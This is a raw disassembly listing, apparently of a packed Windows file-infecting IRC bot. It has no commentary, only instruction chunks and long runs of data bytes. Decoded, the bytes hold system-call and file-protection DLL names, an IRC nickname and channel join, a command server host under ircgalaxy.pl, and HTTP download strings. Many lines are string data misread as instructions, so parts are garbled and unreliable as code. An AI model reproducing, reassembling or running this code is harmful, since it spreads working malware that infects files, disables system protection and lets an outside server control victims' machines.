db 65h
inc ecx
add [edi+65h], al
jz short near ptr loc_314407BD+6
loc_3144076F: ; CODE XREF: sub_3144063F+C5�j
db 65h
insd
loc_31440771: ; CODE XREF: sub_3144063F+BE�j
jo short near ptr loc_314407B7+2
loc_31440773: ; CODE XREF: sub_3144063F+F1�j
imul ebp, [ebp+4Eh], 41656D61h
add [edi+65h], al
jz short near ptr loc_314407D1+3
db 65h
insd
loc_31440782: ; CODE XREF: sub_3144063F+FF�j
jo short near ptr loc_314407D1+3
popa
jz short near ptr loc_314407EE+1
inc ecx
add [edi+65h], al
loc_3144078B: ; CODE XREF: sub_3144063F+105�j
jz short loc_314407E3
db 65h
jb short near ptr loc_31440802+1
loc_31440790: ; CODE XREF: sub_3144063F+DB�j
imul ebp, [edi+6Eh], 74654700h
push esi
loc_31440798: ; CODE XREF: sub_3144063F+110�j
db 65h
jb short near ptr loc_3144080C+2
imul ebp, [edi+6Eh], 417845h
inc edi
db 65h
jz short near ptr loc_314407FB+1
outsd
insb
jnz short near ptr loc_31440811+6
loc_314407AA: ; CODE XREF: sub_3144063F:loc_3144075B�j
db 65h
dec ecx
outsb
outsw
jb short near ptr loc_3144081C+2
popa
jz short near ptr loc_3144081C+1
outsd
outsb
inc ecx
loc_314407B7: ; CODE XREF: sub_3144063F:loc_31440771�j
add [edi+ebp*2+61h], cl
db 64h
dec esp
loc_314407BD: ; CODE XREF: sub_3144063F+12E�j
imul esp, [edx+72h], 41797261h
add [ebp+61h], cl
jo short loc_3144081F
loc_314407C9: ; CODE XREF: sub_3144063F+120�j
imul esp, [ebp+77h], 6946664Fh
insb
loc_314407D1: ; CODE XREF: sub_3144063F+13F�j
; sub_3144063F:loc_31440782�j
add gs:[edi+70h], cl
outs dx, byte ptr gs:[esi]
inc esi
imul ebp, [ebp+4Dh], 69707061h
outsb
db 67h
inc ecx
loc_314407E3: ; CODE XREF: sub_3144063F:loc_3144078B�j
add [edi+70h], cl
outs dx, byte ptr gs:[esi]
push eax
jb short near ptr loc_31440859+1
arpl [ebp+73h], sp
loc_314407EE: ; CODE XREF: sub_3144063F+146�j
jnb short $+2
push eax
jb short loc_31440862
arpl [ebp+73h], sp
jnb short near ptr loc_31440824+7
xor al, [esi+69h]
loc_314407FB: ; CODE XREF: sub_3144063F+164�j
jb short near ptr loc_3144086A+6
jz short $+2
push eax
jb short near ptr loc_3144086A+7
loc_31440802: ; CODE XREF: sub_3144063F+14E�j
arpl [ebp+73h], sp
jnb short near ptr loc_31440839+1
xor cl, [esi+65h]
js short near ptr loc_3144087C+4
loc_3144080C: ; CODE XREF: sub_3144063F:loc_31440798�j
add [ebx+65h], dl
jz short near ptr loc_31440855+2
loc_31440811: ; CODE XREF: sub_3144063F+169�j
imul ebp, [ebp+41h], 69727474h
bound esi, [ebp+74h]
loc_3144081C: ; CODE XREF: sub_3144063F+173�j
; sub_3144063F+170�j
db 65h
jnb short loc_31440860
loc_3144081F: ; CODE XREF: sub_3144063F+188�j
add [ebx+65h], dl
jz short loc_3144086A
loc_31440824: ; CODE XREF: sub_3144063F+1B7�j
imul ebp, [ebp+54h], 656D69h
push ebx
insb
db 65h, 65h
jo short $+4
push ebx
jns short loc_314408A8
jz short loc_3144089C
insd
push esp
loc_31440839: ; CODE XREF: sub_3144063F+1C6�j
imul ebp, [ebp+65h], 69466F54h
insb
db 65h
push esp
imul ebp, [ebp+65h], 6D6E5500h
popa
jo short loc_314408A3
imul esp, [ebp+77h], 6946664Fh
insb
loc_31440855: ; CODE XREF: sub_3144063F+1D0�j
add gs:[esi+69h], dl
loc_31440859: ; CODE XREF: sub_3144063F+1AA�j
jb short near ptr loc_314408CE+1
jnz short loc_314408BE
insb
inc ecx
insb
loc_31440860: ; CODE XREF: sub_3144063F:loc_3144081C�j
insb
outsd
loc_31440862: ; CODE XREF: sub_3144063F+1B2�j
arpl [eax], ax
push edi
jb short loc_314408D0
jz short loc_314408CE
inc esi
loc_3144086A: ; CODE XREF: sub_3144063F+1E3�j
; sub_3144063F:loc_314407FB�j ...
imul ebp, [ebp+0], 6441744Eh
push 75h
jnb short loc_314408EA
push eax
jb short near ptr loc_314408DF+3
jbe short near ptr loc_314408DF+5
insb
loc_3144087C: ; CODE XREF: sub_3144063F+1CB�j
db 65h, 67h, 65h
jnb near ptr 8D5h
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_314408CB+1
jb short near ptr loc_314408EF+1
popa
jz short loc_314408F3
inc esi
imul ebp, [ebp+0], 7243744Eh
db 65h
popa
jz short loc_31440900
push eax
loc_3144089C: ; CODE XREF: sub_3144063F+1F6�j
jb short loc_3144090D
arpl [ebp+73h], sp
jnb short $+2
loc_314408A3: ; CODE XREF: sub_3144063F+20C�j
dec esi
jz short near ptr loc_314408E6+3
jb short loc_3144090D
loc_314408A8: ; CODE XREF: sub_3144063F+1F4�j
popa
jz short loc_31440910
push eax
jb short loc_3144091D
arpl [ebp+73h], sp
jnb short near ptr loc_314408F3+5
js short $+2
dec esi
jz short loc_314408FB
jb short loc_3144091F
popa
jz short near ptr loc_3144091F+3
push ebx
loc_314408BE: ; CODE XREF: sub_3144063F+21C�j
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
inc ebx
jb short near ptr loc_3144092E+1
popa
loc_314408CB: ; CODE XREF: sub_3144063F+248�j
jz short loc_31440932
push ebp
loc_314408CE: ; CODE XREF: sub_3144063F+228�j
; sub_3144063F:loc_31440859�j
jnb short near ptr loc_31440934+1
loc_314408D0: ; CODE XREF: sub_3144063F+226�j
jb short near ptr loc_3144091F+3
jb short loc_31440943
arpl [ebp+73h], sp
jnb short $+2
dec esi
jz short loc_31440929
popa
jo short near ptr loc_31440934+1
loc_314408DF: ; CODE XREF: sub_3144063F+238�j
; sub_3144063F+23A�j
imul esp, [ebp+77h], 6553664Fh
loc_314408E6: ; CODE XREF: sub_3144063F+265�j
arpl [ecx+ebp*2+6Fh], si
loc_314408EA: ; CODE XREF: sub_3144063F+235�j
outsb
add [esi+74h], cl
dec edi
loc_314408EF: ; CODE XREF: sub_3144063F+24A�j
jo short loc_31440956
outsb
inc esi
loc_314408F3: ; CODE XREF: sub_3144063F+24D�j
; sub_3144063F+272�j
imul ebp, [ebp+0], 704F744Eh
loc_314408FB: ; CODE XREF: sub_3144063F+277�j
outs dx, byte ptr gs:[esi]
push eax
jb short loc_3144096F
loc_31440900: ; CODE XREF: sub_3144063F+25A�j
arpl [ebp+73h], sp
jnb short loc_31440959
outsd
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3144095B+1
loc_3144090D: ; CODE XREF: sub_3144063F:loc_3144089C�j
; sub_3144063F+267�j
jo short near ptr loc_31440973+1
outsb
loc_31440910: ; CODE XREF: sub_3144063F+26A�j
push ebx
arpl gs:[ecx+ebp*2+6Fh], si
outsb
add [esi+74h], cl
push eax
jb short near ptr loc_3144098B+1
loc_3144091D: ; CODE XREF: sub_3144063F+26D�j
jz short near ptr loc_31440983+1
loc_3144091F: ; CODE XREF: sub_3144063F+279�j
; sub_3144063F+27C�j ...
arpl [esi+edx*2+69h], si
jb short loc_31440999
jnz short near ptr loc_31440987+1
insb
dec ebp
loc_31440929: ; CODE XREF: sub_3144063F+29B�j
db 65h
insd
outsd
jb short near ptr loc_314409A4+3
loc_3144092E: ; CODE XREF: sub_3144063F+289�j
add [esi+74h], cl
push ecx
loc_31440932: ; CODE XREF: sub_3144063F:loc_314408CB�j
jnz short loc_31440999
loc_31440934: ; CODE XREF: sub_3144063F:loc_314408CE�j
; sub_3144063F+29E�j
jb short near ptr loc_314409AE+1
dec ecx
outsb
outsw
jb short near ptr loc_314409A8+1
popa
jz short loc_314409A8
outsd
outsb
push esp
outsd
loc_31440943: ; CODE XREF: sub_3144063F+293�j
imul esp, [ebp+6Eh], 0
dec esi
jz short near ptr loc_3144099F+2
jb short loc_314409B5
jz short near ptr loc_314409B2+1
push esi
imul esi, [edx+74h], 4D6C6175h
loc_31440956: ; CODE XREF: sub_3144063F:loc_314408EF�j
db 65h
insd
outsd
loc_31440959: ; CODE XREF: sub_3144063F+2C4�j
jb short loc_314409D4
loc_3144095B: ; CODE XREF: sub_3144063F+2CC�j
add [edx+74h], dl
insb
push ebp
outsb
imul esp, [ebx+6Fh], 74536564h
jb short near ptr loc_314409D1+2
outsb
db 67h
push esp
outsd
inc ecx
loc_3144096F: ; CODE XREF: sub_3144063F+2BF�j
outsb
jnb short near ptr loc_314409DA+1
push ebx
loc_31440973: ; CODE XREF: sub_3144063F:loc_3144090D�j
jz short loc_314409E7
imul ebp, [esi+67h], 41535700h
push ebx
jz short loc_314409E0
jb short loc_314409F5
jnz short near ptr loc_314409F2+1
loc_31440983: ; CODE XREF: sub_3144063F:loc_3144091D�j
add [ebx+6Ch], ah
outsd
loc_31440987: ; CODE XREF: sub_3144063F+2E6�j
jnb short loc_314409EE
jnb short near ptr loc_314409F9+1
loc_3144098B: ; CODE XREF: sub_3144063F+2DC�j
arpl [ebx+65h], bp
jz short $+2
arpl [edi+6Eh], bp
outsb
arpl gs:[eax+eax+67h], si
loc_31440999: ; CODE XREF: sub_3144063F+2E4�j
; sub_3144063F:loc_31440932�j
db 65h
jz short near ptr loc_31440A03+1
outsd
jnb short near ptr loc_31440A11+2
loc_3144099F: ; CODE XREF: sub_3144063F+309�j
bound edi, [ecx+6Eh]
popa
insd
loc_314409A4: ; CODE XREF: sub_3144063F+2ED�j
add gs:[edx+65h], dh
loc_314409A8: ; CODE XREF: sub_3144063F+2FE�j
; sub_3144063F+2FB�j
arpl [esi+0], si
jnb short near ptr loc_31440A11+1
outsb
loc_314409AE: ; CODE XREF: sub_3144063F:loc_31440934�j
add fs:[ebx+6Fh], dh
loc_314409B2: ; CODE XREF: sub_3144063F+30D�j
arpl [ebx+65h], bp
loc_314409B5: ; CODE XREF: sub_3144063F+30B�j
jz short $+2
dec ecx
outsb
jz short loc_31440A20
jb short loc_31440A2B
db 65h
jz short loc_31440A03
insb
outsd
jnb short near ptr loc_31440A28+1
dec eax
popa
outsb
db 64h
insb
add gs:[ecx+6Eh], cl
jz short loc_31440A34
jb short near ptr loc_31440A3E+1
loc_314409D1: ; CODE XREF: sub_3144063F+329�j
db 65h
jz short loc_31440A1B
loc_314409D4: ; CODE XREF: sub_3144063F:loc_31440959�j
db 65h
jz short loc_31440A1A
outsd
outsb
outsb
loc_314409DA: ; CODE XREF: sub_3144063F+331�j
arpl gs:[ebp+64h], si
push ebx
loc_314409E0: ; CODE XREF: sub_3144063F+33E�j
jz short near ptr loc_31440A42+1
jz short loc_31440A49
add [ecx+6Eh], cl
loc_314409E7: ; CODE XREF: sub_3144063F:loc_31440973�j
jz short near ptr loc_31440A4C+2
jb short loc_31440A59
db 65h
jz short near ptr loc_31440A3B+2
loc_314409EE: ; CODE XREF: sub_3144063F:loc_31440987�j
jo short loc_31440A55
outsb
inc ecx
loc_314409F2: ; CODE XREF: sub_3144063F+342�j
add [ecx+6Eh], cl
loc_314409F5: ; CODE XREF: sub_3144063F+340�j
jz short near ptr loc_31440A5B+1
jb short loc_31440A67
loc_314409F9: ; CODE XREF: sub_3144063F+34A�j
db 65h
jz short near ptr loc_31440A4A+1
jo short loc_31440A63
outsb
push ebp
jb short near ptr loc_31440A6C+2
inc ecx
loc_31440A03: ; CODE XREF: sub_3144063F+37E�j
; sub_3144063F:loc_31440999�j
add [ecx+6Eh], cl
jz short near ptr loc_31440A6C+1
jb short loc_31440A78
db 65h
jz short near ptr loc_31440A5E+1
db 65h
popa
db 64h
inc esi
loc_31440A11: ; CODE XREF: sub_3144063F+36C�j
; sub_3144063F+35E�j
imul ebp, [ebp+0], 41564441h
push eax
loc_31440A1A: ; CODE XREF: sub_3144063F:loc_314409D4�j
dec ecx
loc_31440A1B: ; CODE XREF: sub_3144063F:loc_314409D1�j
xor esi, [edx]
db 2Eh
inc esp
dec esp
loc_31440A20: ; CODE XREF: sub_3144063F+37A�j
dec esp
add [edx+65h], dl
db 67h
inc ebx
insb
outsd
loc_31440A28: ; CODE XREF: sub_3144063F+383�j
jnb short near ptr loc_31440A8D+2
dec ebx
loc_31440A2B: ; CODE XREF: sub_3144063F+37C�j
db 65h
jns short $+3
push edx
db 65h, 67h
dec edi
jo short loc_31440A99
loc_31440A34: ; CODE XREF: sub_3144063F+38E�j
outsb
dec ebx
db 65h
jns short near ptr loc_31440A7C+2
js short loc_31440A7C
loc_31440A3B: ; CODE XREF: sub_3144063F+3AC�j
add [edx+65h], dl
loc_31440A3E: ; CODE XREF: sub_3144063F+390�j
db 67h
push ecx
jnz short loc_31440AA7
loc_31440A42: ; CODE XREF: sub_3144063F:loc_314409E0�j
jb short near ptr loc_31440ABC+1
push esi
popa
insb
jnz short near ptr loc_31440AAD+1
loc_31440A49: ; CODE XREF: sub_3144063F+3A3�j
inc ebp
loc_31440A4A: ; CODE XREF: sub_3144063F:loc_314409F9�j
js short loc_31440A8D
loc_31440A4C: ; CODE XREF: sub_3144063F:loc_314409E7�j
add [edx+65h], dl
db 67h
push ebx
db 65h
jz short loc_31440AAA
popa
loc_31440A55: ; CODE XREF: sub_3144063F:loc_314409EE�j
insb
jnz short near ptr loc_31440ABC+1
inc ebp
loc_31440A59: ; CODE XREF: sub_3144063F+3AA�j
js short loc_31440A9C
loc_31440A5B: ; CODE XREF: sub_3144063F:loc_314409F5�j
add [esi+33h], dl
loc_31440A5E: ; CODE XREF: sub_3144063F+3CB�j
imul byte ptr [edx+2]
push esi
push esi
loc_31440A63: ; CODE XREF: sub_3144063F+3BD�j
mov edx, esp
push 1
loc_31440A67: ; CODE XREF: sub_3144063F+3B8�j
push edx
push dword ptr [edx+18h]
push esi
loc_31440A6C: ; CODE XREF: sub_3144063F+3C7�j
; sub_3144063F+3C1�j
call dword ptr [ebp+10428Ch]
mov eax, esp
push esi
push esi
push esi
push eax
loc_31440A78: ; CODE XREF: sub_3144063F+3C9�j
push esi
push dword ptr [eax+18h]
loc_31440A7C: ; CODE XREF: sub_3144063F+3FA�j
; sub_3144063F+3F7�j
call dword ptr [ebp+103EFAh]
add esp, 10h
pop esi
retn 8
; END OF FUNCTION CHUNK FOR sub_3144063F
; ---------------------------------------------------------------------------
db 8Dh ;
db 49h ; I
db 0FBh ;
db 2Bh ; +
; ---------------------------------------------------------------------------
loc_31440A8D: ; CODE XREF: sub_3144063F:loc_31440A4A�j
; sub_3144063F:loc_31440A28�j
enter 6851h, 0
; ---------------------------------------------------------------------------
db 0
db 0
db 0E8h ;
db 8Dh ;
db 4Ch ; L
db 24h ; $
db 3
db 6Ah ; j
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_3144063F
loc_31440A99: ; CODE XREF: sub_3144063F+3F3�j
add [edx+5], ch
loc_31440A9C: ; CODE XREF: sub_3144063F:loc_31440A59�j
push ecx
push eax
push ebx
push 5
mov ecx, esp
push eax
mov edx, esp
push eax
loc_31440AA7: ; CODE XREF: sub_3144063F+401�j
push esp
push 40h
loc_31440AAA: ; CODE XREF: sub_3144063F+412�j
push ecx
push edx
push ebx
loc_31440AAD: ; CODE XREF: sub_3144063F+408�j
call dword ptr [ebp+103F22h]
add esp, 0Ch
call dword ptr [ebp+103F2Ah]
loc_31440ABC: ; CODE XREF: sub_3144063F:loc_31440A42�j
; sub_3144063F+417�j
add esp, 8
retn
; END OF FUNCTION CHUNK FOR sub_3144063F
; ---------------------------------------------------------------------------
db 8Dh ;
db 95h ;
db 30h ; 0
db 3Eh ; >
db 10h
db 0
db 33h ; 3
db 0C9h ;
db 6Ah ; j
db 0
db 52h ; R
db 68h ; h
db 30h ; 0
db 0
db 32h ; 2
db 0
db 8Bh ;
db 0C4h ;
db 51h ; Q
db 51h ; Q
db 6Ah ; j
db 40h ; @
db 50h ; P
db 51h ; Q
db 6Ah ; j
db 18h
db 83h ;
db 0C0h ;
db 8
db 54h ; T
db 6Ah ; j
db 0Eh
db 50h ; P
db 0FFh
db 95h ;
db 1Eh
db 3Fh ; ?
db 10h
db 0
db 83h ;
db 0C4h ;
db 20h
db 33h ; 3
db 0D2h ;
db 85h ;
db 0C0h ;
db 0Fh
db 99h ;
db 0C2h ;
db 0F7h ;
db 0DAh ;
db 58h ; X
db 23h ; #
db 0C2h ;
db 0C3h ;
db 57h ; W
db 33h ; 3
db 0FFh
db 0E8h ;
db 0C1h ;
db 0FFh
db 0FFh
db 0FFh
db 0Fh
db 84h ;
db 0A5h ;
db 0
db 0
db 0
db 50h ; P
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 8Bh ;
db 0D4h ;
db 6Ah ; j
db 0
db 8Bh ;
db 0CCh ;
db 6Ah ; j
db 40h ; @
db 68h ; h
db 0
db 0
db 10h
db 0
db 6Ah ; j
db 2
db 52h ; R
db 6Ah ; j
db 0
db 68h ; h
db 28h ; (
db 73h ; s
db 0
db 0
db 6Ah ; j
db 0
db 51h ; Q
db 53h ; S
db 50h ; P
db 0FFh
db 95h ;
db 12h
db 3Fh ; ?
db 10h
db 0
db 5Fh ; _
db 59h ; Y
db 0FFh
db 95h ;
db 62h ; b
db 3Eh ; >
db 10h
db 0
db 85h ;
db 0FFh
db 74h ; t
db 71h ; q
db 8Bh ;
db 8Dh ;
db 90h ;
db 15h
db 10h
db 0
db 0E3h ;
db 0Ch
db 8Dh ;
db 95h ;
db 0
db 10h
db 10h
db 0
db 3
db 0D1h ;
db 57h ; W
db 53h ; S
db 0FFh
db 0D2h ;
db 8Bh ;
db 85h ;
db 0FEh ;
db 3Eh ; >
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 16h
db 29h ; )
db 0
db 0
db 0E8h ;
db 2Bh ; +
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 16h
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 63h ; c
db 29h ; )
db 0
db 0
db 0E8h ;
db 1Ah
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 2
db 3Fh ; ?
db 10h
db 0
db 8Dh ;
db 8Fh ;
db 6Ah ; j
db 29h ; )
db 0
db 0
db 0E8h ;
db 9
db 0FFh
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 6
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 20h
db 8Dh ;
db 8Fh ;
db 77h ; w
db 29h ; )
db 0
db 0
db 0E8h ;
db 0F4h ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 85h ;
db 0Eh
db 3Fh ; ?
db 10h
db 0
db 85h ;
db 0C0h ;
db 74h ; t
db 0Bh
db 8Dh ;
db 8Fh ;
db 84h ;
db 29h ; )
db 0
db 0
db 0E8h ;
db 0DFh ;
db 0FEh ;
db 0FFh
db 0FFh
db 8Bh ;
db 0C7h ;
db 5Fh ; _
db 0C3h ;
db 55h ; U
db 0E8h ;
db 0
db 0
db 0
db 0
; ---------------------------------------------------------------------------
pop ebp
sub ebp, 101B24h
xor ecx, ecx
lea eax, [ebp+101EAFh]
push ecx
push esp
push ecx
push ecx
push eax
push ecx
push ecx
call dword ptr [ebp+103E8Eh]
xchg eax, [esp]
call dword ptr [ebp+103E62h]
pop ebp
retn 4
; ---------------------------------------------------------------------------
db 55h, 0E8h, 0
dd 5D000000h, 1B53ED81h, 0FF6A0010h, 1B1E958Dh, 52500010h
dd 2420CDh, 0C483002Ah, 85C7660Ch, 101B64h, 85C720CDh
dd 101B66h, 2A0024h, 1A6AC35Dh, 9E858h, 428D0000h, 0C9FEAA61h
dd 69C3F075h, 103F7C95h, 8840500h, 95894208h, 103F7Ch
dd 55C3E2F7h, 0E8h, 0ED815D00h, 101BADh, 3F809D8Bh, 7C830010h
dd 0F000824h, 0B984h, 8EC8100h, 54000002h, 10468h, 0B695FF00h
dd 8B00103Eh, 24848DFCh, 104h, 0E8006A50h, 4, 525256h
dd 0B295FF57h, 3300103Eh, 4978DC9h, 51000001h, 51026A51h
dd 68016Ah, 52400000h, 3E7E95FFh, 85960010h, 505B74F6h
dd 1046854h, 0FF570000h, 22024B4h, 95FF0000h, 103F5Eh
dd 74C08559h, 5014E316h, 6AD48Bh, 56575152h, 3EF695FFh
dd 85590010h, 56D075C0h, 3E6295FFh, 578D0010h, 6A575244h
dd 978D5844h, 104h, 6AC033ABh, 0ABF35910h, 50505050h, 52505050h
dd 3E8695FFh, 0C4810010h, 208h, 82474FFh, 3F4E95FFh, 0FF530010h
dd 103F4E95h, 4C25D00h, 0A3E8000h, 8B460175h, 10158C8Dh
dd 8D19E300h, 10100095h, 56D10300h, 0C084D2FFh, 11F880Fh
dd 840F0000h, 110h, 753A3E80h, 3E804610h, 1840F00h, 80000001h
dd 0F175203Eh, 503E8146h, 75474E49h, 0C6CF8B42h, 2B4F0146h
dd 6A51CEh, 0FF535651h, 103F4695h, 0C13B5900h, 0DF850Fh
dd 858D0000h, 101EA3h, 0C68006Ah, 50000000h, 4695FF53h
dd 3D00103Fh, 0Ch, 0BF850Fh, 0B1E90000h, 81000000h, 4952503Eh
dd 0A5850F56h, 83000000h, 3CAC08C6h, 99840F0Dh, 3C000000h
dd 0ACF37520h, 850F3A3Ch, 8Ch, 20200DADh, 213D2020h, 75746567h
dd 203CAC7Fh, 7E817C75h, 746820FFh, 81717574h, 3A70037Eh
dd 68752F2Fh, 0FF47C6h, 10BA310Fh, 0F7000027h, 95FF52E2h
dd 103EE6h, 5050C033h, 9E85050h, 44000000h, 6C6E776Fh
dd 64616Fh, 3F5695FFh, 0C0850010h, 0C9333674h, 3F808589h
dd 68510010h, 80000200h, 50565151h, 3F5A95FFh, 958D0010h
dd 101BA7h, 54C93350h, 51525051h, 8E95FF51h, 8700103Eh
dd 95FF2404h, 103E62h, 8D80C3F8h, 10157Fh, 6AC3F901h, 0FF016A01h
dd 473FF33h, 0C08515FFh, 0DB335A74h, 0BB3D08Bh, 8D3C5003h
dd 101DCBB5h, 0CBA8B00h, 8B000001h, 1088Ah, 2BF80300h
dd 0CB8B60CBh, 7461A6F3h, 0F5E24705h, 0C7832EEBh, 0CC8B530Fh
dd 50D48B57h, 51406A54h, 0FFFF6A52h, 103F2295h, 968D8B00h
dd 8300103Eh, 0CF2B0CC4h, 0C707E983h, 0E8006A07h, 34F8900h
dd 464F53C3h, 52415754h, 694D5C45h, 736F7263h, 5C74666Fh
dd 646E6957h, 5C73776Fh, 72727543h, 56746E65h, 69737265h
dd 455C6E6Fh, 6F6C7078h, 726572h, 67726154h, 6F487465h
dd 2007473h, 55500000h, 70D08F72h, 69786F72h, 72692E6Dh
dd 6C616763h, 2E797861h, 4E006C70h, 204B4349h, 6C627A67h
dd 616B7077h, 4553550Ah, 4A742052h, 204E494Fh, 72697626h
dd 550A7574h, 0E8h, 0ED815D00h, 101EB5h, 157F85C6h, 0FF000010h
dd 103EBA95h, 1FE8C100h, 1E6A3C74h, 3E72B58Bh, 0AC590010h
dd 2A752E3Ch, 0FF3E8166h, 8D23751Dh, 103F76BDh, 2768B00h
dd 0A566A557h, 38EC858Dh, 858F0010h, 103912h, 0FA4689FAh
dd 0FBFE4E8Ch, 0CFE201B1h, 21E850EBh, 83FFFFFBh, 408247Ch
dd 8E84475h, 53000000h, 442E4346h, 0FF004C4Ch, 103EC695h
dd 74C00B00h, 26A930Dh, 6E95FF53h, 0FF00103Eh, 97E893D0h
dd 0E8FFFFFEh, 0Bh, 5F434653h, 442E534Fh, 0FF004C4Ch, 103EC695h
dd 0FE7CE800h, 0E8FFFFh, 0FFFFFFF6h, 1012D48Dh, 8DC93300h
dd 10432485h, 51515100h, 51515051h, 0C295FF51h, 0E800103Eh
dd 0Bh, 52455355h, 442E3233h, 0FF004C4Ch, 103EC695h, 0AE800h
dd 73770000h, 6E697270h, 416674h, 6E95FF50h, 8900103Eh
dd 103E7685h, 8D310F00h, 1019858Dh, 7C858900h, 5100103Fh
dd 3EC695FFh, 68930010h, 4, 1992B58Dh, 8D590010h, 103F62BDh
dd 0F5C2E800h, 0C766FFFFh, 101E7585h, 83500000h, 101E77A5h
dd 958D0000h, 101E35h, 16A5450h, 6852006Ah, 80000002h
dd 3F6695FFh, 0C0850010h, 8D22755Ah, 101E688Dh, 66A5200h
dd 1E75B58Dh, 56540010h, 52515050h, 3F6A95FFh, 0FF580010h
dd 103F6295h, 8385C600h, 1041h, 0CE8h, 4F535700h, 32334B43h
dd 4C4C442Eh, 0C695FF00h, 9300103Eh, 768h, 0E9B58D00h
dd 59001018h, 3F32BD8Dh, 3DE80010h, 0E8FFFFF5h, 0Ch, 494E4957h
dd 2E54454Eh, 4C4C44h, 3EC695FFh, 0C0850010h, 235840Fh
dd 68930000h, 5, 1927B58Dh, 8D590010h, 103F4EBDh, 0F506E800h
dd 0BD83FFFFh, 103F52h, 10840F00h, 81000002h, 190ECh, 1685400h
dd 0FF000001h, 103F3295h, 90C48100h, 50000001h, 6AD48Bh
dd 5295FF52h, 8500103Fh, 0D7559C0h, 138868h, 0E695FF00h
dd 0EB00103Eh, 77BD83E2h, 101Eh, 858D2975h, 101E7Bh, 3E95FF50h
dd 8500103Fh, 89840FC0h, 8B000001h, 8B0C40h, 858F30FFh
dd 101E77h, 418385C6h, 6A010010h, 6A016A00h, 4A95FF02h
dd 8300103Fh, 840FFFF8h, 160h, 73958D93h, 6A00101Eh, 0FF535210h
dd 103F3A95h, 0FC08500h, 14085h, 94BD8D00h, 0B100101Eh
dd 0FA3CE808h, 9468FFFFh, 5E000000h, 3489E62Bh, 95FF5424h
dd 103EBEh, 1EA2BD8Dh, 1B10010h, 0FFFA1DE8h, 8F958DFFh
dd 6A00101Eh, 146800h, 53520000h, 3F4695FFh, 448D0010h
dd 958D1424h, 104324h, 0AB60F50h, 1424448Bh, 208E0C1h
dd 4A12014Ah, 34A1202h, 824440Bh, 0C10FE180h, 0B5108E0h
dd 0FF102444h, 0BD8D5032h, 103F84h, 1CE8h, 362E2500h, 202E2078h
dd 253A202Eh, 382E2525h, 20782578h, 4A0A7325h, 204E494Fh
dd 95FF5700h, 103E76h, 0ACC481h, 6A0000h, 0FF535750h, 103F4695h
dd 988D8B00h, 6A001015h, 6B1BE300h, 0E8510DC9h, 5, 0A642526h
dd 95FF5700h, 103E76h, 500CC483h, 7680BEBh, 8D000000h
dd 101EA8BDh, 0FF535700h, 103F4695h, 7EC08500h, 84B58D54h
dd 8300103Fh, 101598A5h, 8D8D0000h, 104183h, 6ACE2Bh, 0FF535651h
dd 103F4295h, 0F88300h, 8B912F7Eh, 84B58DFEh, 0B000103Fh
dd 75AEF20Dh, 2AE86010h, 61FFFFFAh, 9E31772h, 0EB01778Dh
dd 2BCF8BEAh, 84BD8DCEh, 0F300103Fh, 0EBF787A4h, 95FF53B9h
dd 103F36h, 157FBD80h, 74010010h, 7530682Ah, 95FF0000h
dd 103EE6h, 4183BD80h, 74000010h, 7785C711h, 101Eh, 0C6000000h
dd 10418385h, 8E90000h, 0C7FFFFFEh, 10158885h, 0
dd 4C25D80h, 4F0A0D00h, 6F6F6E20h, 666F206Eh, 66696C20h
dd 4F202165h, 6D697420h, 6F742065h, 6C656320h, 61726265h
dd 0D216574h, 2020200Ah, 204F2020h, 6D6D7573h, 67207265h
dd 65647261h, 0A0D216Eh, 656C6552h, 656C746Eh, 796C7373h
dd 70616820h, 61207970h, 6520646Eh, 63657078h, 746E6174h
dd 7473202Ch, 69646E61h, 203A676Eh, 570A0D2Dh, 68637461h
dd 20676E69h, 206C6C61h, 20796164h, 20646E61h, 6867696Eh
dd 66202C74h, 6620726Fh, 6E656972h, 49207364h, 69617720h
dd 0A0D3A74h, 72656857h, 72612065h, 6F792065h, 66202C75h
dd 6E656972h, 203F7364h, 656D6F43h, 74492021h, 20736920h
dd 656D6974h, 74492021h, 6C207327h, 21657461h, 10A61429h
dd 40375232h, 27B1FAE5h, 4CA2A1A8h, 40375248h, 86E15194h
dd 0C26CCC5Ch, 8F908788h, 658000B9h, 0D8B8B352h, 15h dup(0)
dd 0C768988Fh, 0F4A58360h, 1042h, 42F8A583h, 0F000010h
; CODE XREF: UPX2:31441FBA�p
; UPX2:31441FE1�p ...
dd 8D1443B7h, 0B70F1853h, 0D003064Bh, 2424448Bh, 720C422Bh
dd 8423B19h, 428B1473h, 0C422B14h, 42F49589h, 85890010h
dd 1042F8h, 0C28305EBh, 61D9E228h, 880004C2h, 10246785h
dd 64E800h, 20680000h, 8D000000h, 10239485h, 18395900h
dd 0C0830C74h, 0FFF7E204h, 1042D085h, 0D9F7C300h, 24678D03h
dd 10E30010h, 8FFC70FFh, 4E88300h, 9D89F6E2h, 102394h
dd 74003A83h, 3322B05h, 4E8D1072h, 5E5B58FCh, 74003A83h
dd 0EB32FF04h, 1072FF03h, 0FFFF57E8h, 2BCE2BFFh, 1042F88Dh
dd 4B035800h, 858FC334h, 1042D4h, 42D085C7h, 10h, 3CE80000h
dd 8B000000h, 1042D085h, 0F6A9E800h, 18E8FFFFh, 83000000h
dd 1042D0BDh, 8750000h, 24109D89h, 9CEB0010h, 42D08DFFh
dd 8FC30010h, 1042D485h, 0D0958900h, 0E8001042h, 3, 8BC3C933h
dd 8093h, 0EDE85200h, 3FFFFFEh, 1042F895h, 83D60300h, 0F000C7Ah
dd 10784h, 107A8300h, 0FD840F00h, 8B000000h, 0E8500C42h
dd 0FFFFFEC8h, 42F88503h, 0C6030010h, 80088A50h, 197400F9h
dd 742EF980h, 0F1EB4003h, 8101488Bh, 0DFDFDFE1h, 44F981DFh
dd 75004C4Ch, 0C82B59ECh, 0FFAF983h, 0B78Fh, 78816600h
dd 0F3233FEh, 0AB85h, 3A835600h, 8B057500h, 2EB104Ah, 0F1030A8Bh
